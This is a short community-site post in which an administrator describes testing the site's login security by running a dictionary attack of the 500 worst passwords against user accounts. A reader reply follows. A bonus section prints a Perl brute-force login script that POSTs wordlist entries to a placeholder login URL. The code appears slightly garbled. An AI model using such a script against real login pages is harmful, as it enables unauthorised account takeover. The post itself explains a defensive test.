You have officially passed the stupid password test!


I have been working on a couple security improvements for the site relating to login and authentication.  Primarily on a policy to handle failed logins and bot attacks.  Doing so necessitates the testing thereof, and I have thusly created a script to perform a dictionary attack.


A dictionary attack is very simple; a program tries repeatedly to log into an account using a list of words, often a dictionary as words are commonly used as passwords due to that they're easily remembered.


So what does this have to do with you, a loyal VG Press user?  Well, contrary to what you may think, I have no idea what your password is!  Every password is one-way encrypted before being sent to the server, then salted and hashed once more for good measure, so I can only see a garbled mess in the database.


So I set loose my script using a list of the 500 worst passwords that alledgedly encompasses the passwords of 1 in every 9 users.


But every active VG Press member has a password that is not on the list of the 500 worst.  Hoorah!



BONUS SECTION


For those interested in the code being the attack, it was written in Perl.  As to not needlessly give a program to do this to a live site, this isn't the exact program, but it's effectively the same.

 

use HTTP::Request::Common qw(POST); 

use LWP::UserAgent; 

 

$file = "dictionary.txt"; 

open FILE, $file or die $!; 

print "Enter Username: "; 

my $input = ; 

$username = substr $input, 0, (length $input)-1; 

while(my $line = ) 

{ 

  $word = substr $line, 0, (length $line)-1; 

  do 

    { 

        $ua = LWP::UserAgent->new; 

        $ua->timeout(3); 

        my $req = (POST 'http://insecuresite.com/login',  

["username" => $username, 

"password" => $word]); 

        $response = $ua->request($req); 

        $content = $response->content; 

    } 

    while($content == "500 read timeout"); 

 

    if(!(length $content > 0)) 

    { 

        print "PASSWORD: $wordn"; 

        exit; 

    } 

} 

close FILE; 

print "No matches foundn"; 

exit; 

The likely solution is going to be exponentially increasing minimum time period between log-in attempts based on IP address.

Then it's a good thing I recently changed my password from "pussy" to something else.